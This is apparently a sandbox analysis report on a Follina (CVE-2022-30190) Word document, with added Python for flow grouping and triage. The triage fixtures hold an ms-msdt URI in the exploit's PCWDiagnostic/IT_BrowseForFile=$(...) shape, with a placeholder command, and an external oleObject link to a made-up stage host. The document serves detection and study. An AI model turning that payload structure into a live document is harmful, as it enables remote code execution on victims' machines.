Source: global traffic (TCP; sandbox guest 192.168.2.22 <-> 185.27.134.11)
The report lists 167 per-packet events as bare 4-tuples (no protocol decode). They are grouped here by connection, in order of first appearance; in the report the rows of these six connections are interleaved.

  Connection (client -> server)                client->server  server->client  Notes
  192.168.2.22:49179 -> 185.27.134.11:21            33              19          present from the first event of the capture to the last
  192.168.2.22:49180 -> 185.27.134.11:21            27              17          opened while 49179 is up; present until just before the end
  192.168.2.22:49181 -> 185.27.134.11:18657         10               9          client-initiated to a high server port while 49180 is up
  192.168.2.22:49183 -> 185.27.134.11:21            10               8          opened as the 49181 connection winds down
  192.168.2.22:49184 -> 185.27.134.11:30008          7               9          client-initiated to a high server port while 49180 is up
  192.168.2.22:49186 -> 185.27.134.11:21            10               8          opened as the 49184 connection winds down
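The grouping above can be reproduced from the raw report lines. The following is an added example, not part of the sandbox report: a small Python parser that folds the per-packet "TCP traffic" lines into connections and applies a port heuristic. Port 21 is the registered FTP control port, and a client-initiated connection to a high server port opened after a control channel is the shape of a passive-mode (PASV/EPSV) data channel; since the report shows no payload, that reading is an inference from port numbers only, and the code labels it as such. The sample input is a constructed subset of this report's lines, in their original order; the guest prefix 192.168.2. is taken from the report.

```python
import re
from collections import OrderedDict
from dataclasses import dataclass

# Constructed sample: a subset of the "TCP traffic" lines from this report, kept in their
# original order (the full capture has 167 such lines across six connections).
SAMPLE_EVENTS = """\
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
"""

LINE_RE = re.compile(
    r"TCP traffic:\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s*->\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)"
)


@dataclass
class Flow:
    client: str
    client_port: int
    server: str
    server_port: int
    first_seen: int          # index of the first event for this connection
    out_pkts: int = 0        # client -> server events
    in_pkts: int = 0         # server -> client events

    def key(self):
        return (self.client, self.client_port, self.server, self.server_port)


def parse_flows(text, client_net="192.168.2."):
    """Group per-packet report lines into connections keyed by the client-side 4-tuple.
    The endpoint inside client_net (the sandbox guest) is taken as the client."""
    flows = OrderedDict()
    for idx, line in enumerate(text.splitlines()):
        m = LINE_RE.search(line)
        if not m:
            continue
        src, sport, dst, dport = m.group(1), int(m.group(2)), m.group(3), int(m.group(4))
        if src.startswith(client_net):
            key, outbound = (src, sport, dst, dport), True
        else:
            key, outbound = (dst, dport, src, sport), False
        flow = flows.get(key)
        if flow is None:
            flow = flows[key] = Flow(*key, first_seen=idx)
        if outbound:
            flow.out_pkts += 1
        else:
            flow.in_pkts += 1
    return list(flows.values())


def classify_ftp(flows):
    """Label each connection. Port 21 is the registered FTP control port; a client-initiated
    connection to a high port on the same server, opened after a control channel exists, has
    the shape of a passive-mode data channel. Without payload this is only a heuristic, hence
    the question mark in the label."""
    control = [f for f in flows if f.server_port == 21]
    labels = {}
    for f in flows:
        if f.server_port == 21:
            labels[f.key()] = "ftp-control"
        elif f.server_port > 1023 and any(
            c.server == f.server and c.first_seen < f.first_seen for c in control
        ):
            labels[f.key()] = "ftp-passive-data?"
        else:
            labels[f.key()] = "other"
    return labels


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_EVENTS)
    labels = classify_ftp(flows)
    for f in flows:
        print(f"{f.client}:{f.client_port} -> {f.server}:{f.server_port}  "
              f"out={f.out_pkts} in={f.in_pkts}  {labels[f.key()]}")
```

Feeding the full list of report lines to parse_flows gives the six connections and the per-direction counts in the table above; with a real pcap the same grouping is better done on the TCP stream index, and the FTP reading should be confirmed from the control-channel payload (a PASV/EPSV reply naming the data port) rather than from port numbers.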
YARA matches (source, type, matched rules):

  dump.pcap (PCAP): SUSP_Encoded_Discord_Attachment_Oct21_1; SUSP_PS1_Msdt_Execution_May22; EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
  document.xml.rels (SAMPLE): SUSP_Doc_WordXMLRels_May22
  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html (DROPPED): SUSP_Encoded_Discord_Attachment_Oct21_1; SUSP_PS1_Msdt_Execution_May22; EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 (the report lists this file twice with the same three matches)
  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html (DROPPED): SUSP_Encoded_Discord_Attachment_Oct21_1; SUSP_PS1_Msdt_Execution_May22; EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html (DROPPED): SUSP_Encoded_Discord_Attachment_Oct21_1; SUSP_PS1_Msdt_Execution_May22; EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22

Rule metadata (as given in the report; the score field is empty for every rule):
  SUSP_Encoded_Discord_Attachment_Oct21_1: date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research
  SUSP_PS1_Msdt_Execution_May22: date = 2022-05-31, modified = 2022-07-08, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
  EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22: date = 2022-05-30, modified = 2022-07-18, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07
  SUSP_Doc_WordXMLRels_May22: date = 2022-05-30, modified = 2022-06-20, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
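The three artifact types the rules fired on (the docx relationships part, the fetched HTML with its ms-msdt URI, and an encoded Discord attachment URL) can be triaged without YARA. The following is an added example, not part of the sandbox report and not the rules' own logic: the exact strings of the matched rules are not reproduced, and the checks below are this editor's approximation of what they look for. The relationship and HTML samples are constructed for the example (hostnames, Discord ids and the placeholder inside the URI are made up); the ms-msdt URI shape (PCWDiagnostic, IT_BrowseForFile=$(...), the path to mpsigstub.exe) and the trailing "!" on the external target follow the public Follina write-up referenced in the rule metadata.

```python
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed word/_rels/document.xml.rels: one ordinary internal part and one external
# oleObject relationship of the shape used by Follina documents (hostname is made up).
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://stage.example.invalid/payload.html!" TargetMode="External"/>
</Relationships>
"""

# Constructed second stage (the HTML the relationship fetches): an ms-msdt: URI assigned to
# location.href, with a harmless placeholder where real payloads carry PowerShell, and a
# base64 comment that decodes to a Discord CDN attachment URL (ids made up).
_DISCORD_URL = "https://cdn.discordapp.com/attachments/1/2/stage2.bin"
SAMPLE_HTML = r"""<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($Env:PLACEHOLDER))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
</script>
""" + "<!-- " + base64.b64encode(_DISCORD_URL.encode()).decode() + " -->\n</body></html>"


def suspicious_rels(xml_text):
    """Return oleObject relationships whose target is an external http(s) URL. A genuine
    embedded OLE object is an internal part under embeddings/, so an external URL here is
    the remote-fetch trick Follina documents use to pull the ms-msdt stage."""
    hits = []
    root = ET.fromstring(xml_text.encode("utf-8"))
    for rel in root.iter(REL_NS + "Relationship"):
        target = rel.get("Target", "")
        if (rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External"
                and target.lower().startswith(("http://", "https://"))):
            hits.append({"id": rel.get("Id"), "target": target,
                         # trailing '!' on the target is documented for Follina samples
                         "bang_suffix": target.endswith("!")})
    return hits


# Allow backslash-escaped quotes inside the URI; stop at an unescaped quote or tag bracket.
MSDT_RE = re.compile(r"ms-msdt:(?:\\.|[^\"<>\\])*", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def msdt_uris(html):
    """Find ms-msdt: URIs (after URL-decoding, so %-encoded variants are seen too) and flag
    the PCWDiagnostic / IT_BrowseForFile=$( ... ) shape that makes msdt evaluate a command."""
    results = []
    for m in MSDT_RE.finditer(unquote(html)):
        uri = m.group(0)
        results.append({"uri": uri,
                        "follina_shape": "PCWDiagnostic" in uri and "IT_BrowseForFile=$(" in uri})
    return results


def encoded_discord_urls(text):
    """Decode every long base64-looking run and keep those that contain a Discord CDN
    attachment URL. Runs that are not valid base64 (or not UTF-8 text) are skipped."""
    found = []
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "ignore")
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if "cdn.discordapp.com/attachments/" in decoded:
            found.append(decoded)
    return found


def triage(rels_xml, html):
    """Combine the three checks into one verdict for a document plus its fetched stage."""
    rels = suspicious_rels(rels_xml)
    msdt = [u for u in msdt_uris(html) if u["follina_shape"]]
    discord = encoded_discord_urls(html)
    return {"external_ole": rels, "msdt": msdt, "discord_urls": discord,
            "verdict": "follina-like" if rels and msdt else "inconclusive"}


if __name__ == "__main__":
    print(triage(SAMPLE_RELS, SAMPLE_HTML))
```

In practice suspicious_rels is run on word/_rels/document.xml.rels extracted from the docx (a zip), and msdt_uris plus encoded_discord_urls on whatever the external target returns and on any dropped .html in the Office and IE cache directories, which is where this report found them. An external oleObject relationship is a strong signal on its own even when the stage cannot be fetched any more; the Discord check is a hosting indicator, not proof of malice, since legitimate content is served from the same FQDN.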
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Process information set: NOOPENFILEERRORBOX (11 calls)
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (62 calls)
These are SetErrorMode flags (SEM_NOOPENFILEERRORBOX, SEM_NOALIGNMENTFAULTEXCEPT). Suppressing the open-file error box is routine for Office processes and is not an indicator on its own; the entries matter here only as context for the WINWORD.EXE process that opened the document.